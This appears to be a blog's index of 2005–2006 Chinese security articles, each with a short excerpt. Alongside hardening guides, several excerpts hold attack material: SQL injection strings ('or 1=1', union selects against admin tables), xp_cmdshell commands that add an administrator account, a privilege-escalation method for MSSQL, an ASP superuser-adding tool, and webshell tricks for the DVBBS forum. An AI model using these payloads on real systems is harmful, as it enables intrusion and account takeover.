网络安全
chinawn
这个作者很懒,什么都没留下…
展开
-
如何保护自己的机器不受“网络执法官”盗用IP地址及密码
[信息来源:信息中心 录入:信息中心 发表时间:2004-3-23 14:30:22 ] 大家最近可能都听说过一个软件“网络执法官”,此软件本来是一个不错的网络管理软件,可却被一些别有用心的人用来为非作歹,经过研究发现此软件是一款局域网管理辅助软件,采用网络底层协议,能穿透各客户端防火墙对网络中的每一台主机(包括各种计算机、交换机等配有IP的网络设备)进行监控和管理,甚至可把合法用户赶下原创 2005-08-25 16:27:00 · 3425 阅读 · 0 评论 -
教你手动注入PHP
or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 u原创 2005-04-12 11:26:00 · 808 阅读 · 0 评论 -
巧用Hosts文件 杀掉麻烦的IE浏览器弹出窗口
近来上网的时候,发现一件怪事,在打开IE浏览器的默认主页(http: //www.sina.com.cn)时,总是会多次弹出手机注册播放免费电影的窗口,每次都要点击多次才能关闭,很是麻烦,而且,用“Ctal+Alt +Del”查看运行的程序,会发现有多个网页(http://www.movie-down.com/hosts.asp)被打开运行。 看到这种现象,根据以往的经验,可能是被恶意网页代码原创 2005-04-12 11:28:00 · 1516 阅读 · 0 评论 -
动网后台也可以这样玩!
(偶以前遇到过这样的论坛,只完成了前面的操作可是后面就是一个x不知道怎么办啦,还是九小这小子聪明,哈哈) 今天下午powers群有个伙计给了偶个动网论坛的后台权限,问偶能否拿个webshell,进后台后,就准备备份数据库拿webshell,发现论坛版块 的上传权限没有打开,开了之后,用管理员id发贴上传,*,上传文件被删,接着从头像上传入手,发现asp后缀改为gif一样提示类型不对 ,于是放弃原创 2005-04-12 11:28:00 · 1331 阅读 · 0 评论 -
ms05016分析及测试代码
晕,安焦居然一下进不去了,伤心中...测试环境:WINDOWS XP SP2WINDOWS 2003 SERVER新建一WORD文档,找到下面几行(先找到Root Entry):00002400h: 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 ; R.o.o.t. .E.n.t.00002410h: 72 00 79 00 00 00 AD BA原创 2005-04-15 11:17:00 · 868 阅读 · 0 评论 -
AutoRun.inf文件
最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中的方法,由于AutoRun.inf文件在技术中的应用还是很少见的,相应的资料也不多,有很多人对此觉得很神秘,本文试图为您解开这个迷,使您能完全的了解这个并不复杂却极其有趣的技术。 一、理论基础 经常使用光盘的朋友都知道,有很多光盘放入光驱就会自动运行,它们是怎么做的呢?光盘一放入光驱就会自动被执行,主要依靠两个文件,一是光盘原创 2005-04-18 10:50:00 · 3668 阅读 · 0 评论 -
让路由器远离字典DoS攻击
针对路由器的DoS字典攻击可以让攻击者取得Cisco路由器的访问权或者可能导致用户无法使用路由器。在本文中,你可以找到如何使用Cisco 网络操作系统的增强登陆功能来防止这种攻击。 你可能还没有认识到使用针对Telnet、SSH或者HTTP端口的字典式拒绝服务的(DoS)攻击可能成功的攻击你的Cisco路由器。事实上,我敢打赌,即便是大多数网络管理员没有全部打开这些端口,那么他至少也会打开其原创 2005-04-12 11:03:00 · 1262 阅读 · 0 评论 -
使用Http通道突破防火墙限制
不少公司的防火墙作了较为严格的限制,以至于很多网络服务如QQ、MSN都无法运行,如果你还能够打开网页,那么,使用Http通道软件可以让你突破限制,可以在现有的网络条件中使用任何网络服务。 使用Http通道软件可以突破防火墙的限制,利用唯一Http访问的权限获得其他Internet应用。那么什么是通道呢?这里所谓的通道,是指一种绕过防火墙端口屏蔽的通讯方式。防火墙两端的数据包封装在防火墙所允许通原创 2005-04-12 11:04:00 · 2623 阅读 · 0 评论 -
XP使用技巧问答
问:我安装Windows的服务包后,或者安装系统后,如何察看我的系统是否已经激活了? 答:打开开始菜单,找到运行,输入如下命令 “oobe/msoobe /a”(引号内部分,注意:oobe/msoobe与/a之间有一个空格。) 问:我安装了Windows XP,现在分区有两种格式,分别是NTFS和FAT32,如何实现将FAT32格式的分区转化成NTFS,又如何实现将NTFS格式分区转化成FAT32原创 2005-04-12 11:18:00 · 1002 阅读 · 0 评论 -
服务器安全配置精华
Windows2000 含有很多的安全功能和选项,如果你合理的配置它们,那么windows 2000将会是一个很安全的操作系统.。 初级安全篇 1.物理安全 服务器应该安放在安装了监视器的隔离房间内,并且监视器要保留15天以上的摄像记录。另外,机箱,键盘,电脑桌抽屉要上锁,以确保旁人即使进入房间也无法使用电脑,钥匙要放在另外的安全的地方。 2.停掉Guest 帐号 在计算机管理的用户里面把gues原创 2005-04-12 11:30:00 · 1175 阅读 · 0 评论 -
SQL总结
此文章是对网上大量同类文章的分析与总结,并结合自己实施过程中的体会综合而成,其中有不少直接引用,没有注意出处,请原作者见谅)随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根 据程序返回的结果,获得某些他想得原创 2005-04-20 10:54:00 · 1071 阅读 · 0 评论 -
SQL注入防御方法-程序员篇
作者:NB联盟-小竹 ps:老东西了,没别的意思。对曾经促进过网络安全事业的54nb的一点怀念吧! SQL注入越来越多的被利用来入侵网站,部分WEB程序员也开始关注这方面的知识,但由于对入侵的方法一知半解,导致在过滤的时候漏掉某些字符,造成安全漏洞;或者是草木皆兵,把一些合法的用户请求都拒之门外,试想一下,当用户想输入个Im a boy的时候,却给你臭骂一顿,他还会愿意再上你的网站吗? 下面,原创 2005-09-18 16:33:00 · 1047 阅读 · 0 评论 -
msSQL注入通杀,只要有注入点就有系统权限
不知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp原创 2005-09-18 16:34:00 · 1380 阅读 · 0 评论 -
溢出下shell下的文件上传
随着网上溢出程序的流行经常能在BBS和群里看到象我等"快餐黑客"抱怨说溢出之后不知道怎样传送自己的木马,后门到肉鸡上。而没有在肉鸡上留下木马或后门进一步控制不能算是完成一次成功的入侵,所以我在此归纳了一下网上流行的溢出shell下传送文件的方法,希望能够对刚入门的新手朋友带来帮助。 1.首先要说的是初学者最爱的IPC$共享传送方式了,用法很简单。先在溢出shell下建立一个管理员权限的帐号,然后原创 2005-09-18 16:36:00 · 1240 阅读 · 0 评论 -
google hacking
google hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉google hacking其实并非如此简单...google hacking的简单实现 记得以前看见过一篇文章写的就是简单的通原创 2005-04-24 22:10:00 · 909 阅读 · 0 评论 -
数秒钟之内破解MySQL的MD5函数
As per the documentation on MySQL I moved the storage of passwords from using Password() to using MD5(). I read a number of places that stated that this was a method that couldnt be reversed and it w原创 2005-05-09 08:39:00 · 1736 阅读 · 0 评论 -
Windows Server 2003 安全配置实战演习
windows server2003是目前最为成熟的网络服务器平台,安全性相对于windows 2000有大大的提高,但是2003默认的安全配置不一定适合我们的需要,所以,我们要根据实际情况来对win2003进行全面安全配置。说实话,安全配置是一项比较有难度的网络技术,权限配置的太严格,好多程序又运行不起,权限配置的太松,又很容易被黑客入侵,做为网络管理员,真的很头痛,因此,我结合这几年的网络安全原创 2005-04-12 11:23:00 · 972 阅读 · 0 评论 -
GIF89a结合动网后台(7.1以前)取得webshell的完整解释
背景: (1)动网上传文件,备份得到后门 (2)使用GIF89a可以上传内容为木马的gif图片:逃过头像上传的检测。 所以产生了新的方法:上传gif头像图片,备份得到木马了。(使用范围为:动网7.1以前的版本) 但是很多人在执行后门后出现的是一张不能显示的图片. 偶还是公布一下我用了恩久的更方便的方法,同时解释一下为什么会出现这种情况.: 就是GIF89a加站长助手,运行后门的时候看到的就是站长助原创 2005-04-12 11:05:00 · 1324 阅读 · 0 评论 -
WINDOW自带工具.
在运行里可以直接执行.省时间了.winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构(WMI) wupdmgr--------windows更新程序 wscript--------windows脚本宿主设置 write----------写字板 winmsd---------系统信息 wiaacmgr-------扫描仪和照相机向导 w原创 2005-04-05 11:25:00 · 696 阅读 · 0 评论 -
桂林老兵的SQLSERVER高级注入技巧
前言: 即是高级技巧,其它基本的注入方法就不详述了。 看不懂可查本站的注入基础文章。 为了更好的用好注入,建议大家看看本站的SQL语法相关文章 [获取全部数据库名] select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库 [获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名] selec原创 2005-04-12 11:06:00 · 1263 阅读 · 0 评论 -
添加超级用户的.asp代码
程序代码: .network对象脚本权限提升漏洞利用工具 用户: 密码: on error resume next if request.servervariables("REMOTE_ADDR")response.write "iP !s n0T RiGHt" else if request("username")username=request("username") passwd=re原创 2005-04-12 11:07:00 · 683 阅读 · 0 评论 -
修改XP开机画面最简单办法(图)
最新发现一个通过修改Boot.ini文件以修改Windoows XP的开机画面的技巧 第一步:建立自己的开机画面 做此开机画面的图片要求:图片取名为Boot.bmp,大小640*480,16色的bmp位图,保存在系统盘的windows目录下。 建议在Photoshop中新建一个大小640*480全黑的图层做背景,然后将自己喜欢的图片放到黑色的图层上。图片模式改为索引。保存时选择16色(原创 2005-04-12 11:10:00 · 1804 阅读 · 0 评论 -
对一个注册表项的粗略分析
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options] 注册表的这个项大家可能还不太熟悉,因为这个主要是用来调试程序用的,对一般用户 意义不大。默认是只有管理员和local system有权读写,一般user只读。 先做个实验:在这个项下新建一个子项“test.exe”,再建一个字串值“Debu原创 2005-04-12 11:12:00 · 1026 阅读 · 0 评论 -
非常经典的渗透入侵
作者:sunwear mail:shellcoder@163.com time:2004,5,7 前言: 这篇文章比较长,希望你有耐心看完。我入侵的服务器为国家一个著名安全站点。过程很复杂 经过了1个星期的奋斗。希望多各位有所帮助。 请耐心看完 :)。其中也有关于社会工程学的。 正文 废话不说。开工 C:/Documents and Settings/Administrator>ping www.原创 2005-04-12 11:13:00 · 3448 阅读 · 3 评论 -
SQL Server提升权限相关命令及防范
来源:http://neeao.com ;exec master..xp_cmdshell "net user name password /add"-- ;exec master..xp_cmdshell "net localgroup administrators name /add"-- 程序代码开启cmdshell的SQL语句 EXEC sp_addextendedproc xp_cmds原创 2005-04-12 11:17:00 · 775 阅读 · 0 评论 -
破解加密网页全功略
有时候我们在网上看到一个好的网页特效或者图片时,想要查看网页的源码,但是却发现网页不但右键给锁定了,而且有时就直接禁止查看源代码。即使能查看源代码,却只看到了一堆乱码。这些网页正是使用了加密的方法将源码给隐藏起来了。在前面加密的文章有一篇对网页进行加密的文章,里面讲了几种对网页加密的方法,即然有加密,当然就有解密了,现在就让我们一探其中的究竟! 1、右键弹出窗口 (1)这种在网页上单击右键原创 2005-04-12 11:27:00 · 1950 阅读 · 0 评论 -
利用IIS日志追查网站入侵者
原件下载地址:http://www.cnbct.org/IISLOG.doc 以前黑站黑了很多,但是就没有想过会不会被追踪到,都没有想过怎么去擦自己的屁股,万万没想到在自己不再黑站的时候,却发现了自己的BBS被黑了。根据当初的判断,BBS程序是我们BCT小组成员编写的Lvbbs不会存在着上传漏洞和SQL注入啊!就算能拿到权限都不可能可以弄出个webshell出来,不是程序的漏洞的话,原创 2005-04-12 11:31:00 · 924 阅读 · 0 评论 -
系统启动时弹出对话框
受到更改的注册表项目为:HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Winlogon在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“LegalNoticeCaption”是提示框的标题,“LegalNoticeText”是提示框的文本内容。由于它们的存在,就使得我们原创 2005-04-12 14:08:00 · 1051 阅读 · 0 评论 -
四个步骤加强网络防护
通过采用以下四个步骤,你能够减轻保护网络的压力。下面是一些加强你的网络防护的方法。 最近,微软在宣传如果你想要得到一个真正安全的网络,你必须关注5个重要的领域。这些领域包括周边防护,网络防护,应用防护,数据防护,和主机防护。在本文中,我将讨论网络防护,帮助获得深度安全。 作者提示 微软的安全哲学是你应该关注五个独立的领域,就好象你需要独立对它们进行防护。这样的话,你就能够确保这些领域都得到了原创 2005-04-12 11:02:00 · 962 阅读 · 0 评论 -
巧用无敌命令结束系统进程
进程是程序在计算机上的一次执行活动。当你运行一个程序,你就启动了一个进程。显然,程序是死的(静态的),进程是活的(动态的)。进程可以分为系统进程和用户进程。凡是用于完成操作系统的各种功能的进程就是系统进程,它们就是处于运行状态下的操作系统本身;用户进程就是所有由你启动的进程。进程是操作系统进行资源分配的单位。有些进程我们通过“任务管理器”是不能结束的,如果遇到木马怎么办呢?我们可以强行结束这个进程原创 2005-04-12 11:14:00 · 725 阅读 · 0 评论 -
Access 2K/XP 数据库的最佳NTFS权限设置
我们已经知道,ASP.NET 中使用 ADO.NET 访问数据库,通过 OleDb 的连接可以访问 Access 数据库——我们非常常用的低端数据库之一。本文讨论了 ASP.NET 中可能看到的若干错误提示,从中看到 Access 2000 和 Access XP 创建的数据库文件,在访问出现错误时会出现不太相同的错误提示。希望对大家有所帮助。另一个要点是,希望通过此文,使大家对 ASP.NET原创 2005-04-12 11:20:00 · 702 阅读 · 0 评论 -
劫持数据库,实现跨站攻击(图)
http://www.heibai.net/article/info/info.php?sessid=&infoid=19309原创 2005-04-12 11:22:00 · 727 阅读 · 0 评论 -
防止黑客鉴别你的操作系统
大家都知道,通过PING 和TRACERT程序能判断目标主机类型。ping最主要的用处是检测目标主机是否连通。TRACERT利用ICMP数据包和数据包头部中和IP数据包中TTL的值,防止数据包不断在IP互联层上永远不终止地循环。 许多入侵者首先会PING一下你的机子,如见到TTL值为128就可以认为你的系统为WINDOWNT/2000,如果TTL值是32则认为目标主机操作系统是WIND原创 2005-04-12 11:23:00 · 854 阅读 · 0 评论 -
对dvbbs7.1 sp1最新savepost.asp漏洞的研究和利用
动网论坛(DVBBS 7.1.0 SP1)Savepost.asp存在严重漏洞10-May-06发现:Bug.Center.Team严重程度:严重厂商名称:动网论坛(DVBBS)程序版本:DVBBS 7.1.0 SP1漏洞分析: 因为程序在savepost.asp文件中变量过滤不严,导致数据库处理产生漏洞,可以取得论坛所有权限以及webshell。已经提交官方审核,并通过确认,补丁已经公布厂商补转载 2006-05-14 23:08:00 · 4305 阅读 · 0 评论